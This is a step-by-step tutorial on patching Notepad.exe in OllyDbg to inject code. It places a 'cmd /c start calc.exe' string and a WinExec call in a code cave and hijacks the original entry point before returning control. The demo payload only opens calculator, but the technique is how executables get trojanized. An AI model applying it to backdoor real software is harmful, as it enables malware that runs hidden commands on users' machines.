Manual Code Injection

Open Notepad.exe with OllyDbg. Once it is loaded, highlight all the code up to the first “Call” Procedure you see. Right-click then copy the highlighted lines to a text editor for later. Remember that the first line is the original entry point (OEP).


Example:

0100739D > $ 6A 70               PUSH 70 (OEP)
0100739F   . 68 98180001        PUSH notepad.01001898
010073A4   . E8 BF010000        CALL notepad.01007568




Scroll down until you see the end of all the code and the beginning of your code caves (DB 00). Then select as many empty lines as you need then right-click, click on “Binary” then “Edit”. Place your function(s) in the “ASCII” box then click “OK”. Once that is done, Ctrl+A to assemble the code. Make note of the first address ( 01008748 ) that starts your function(s).


Example:

01008748 ASCII “cmd /c start calc.exe”




Now under your function, select empty line(s) to place your API with your function address. Click “a” then place your code in and then click on “Assemble”.


Example:

0100877D PUSH 0
0100877E PUSH 01008748 (function address)
0100877F Call WinExec




In the CPU window right-click then select “Go to” then “Origin”. That will take you back to the original entry point again. Double click on the entry point and replace it with a jump to the line of your first function then click on “Assemble” again.


Example:

JMP 0100877D




Now look at the code you copied down in your text editor and the new code you just replaced the OEP with. You will see that two lines of code have been changed.


Example:

PUSH 70
PUSH notepad.01001898




Highlight the new jump entry point you made then click on “Enter”. This will take you to the function you created. Right Under your API Call (don't skip a DB 00) highlight three empty lines then click “a”. Now place all the code that had changed, back in with the first call procedure you also copied down. Make “CALL notepad.01007568” procedure a jump.


Example:

PUSH 70
PUSH 01001898
JMP  010073A4




Now right-click in the CPU window and select “Copy to executable” then “All modifications”. Click on “Copy all”. A new window will then pop up, close it. It will ask you if you want to save these new changes, click “Yes” and save the new executable. Run the new executable and it should run your injected code. This will run calculator.

by
Huxley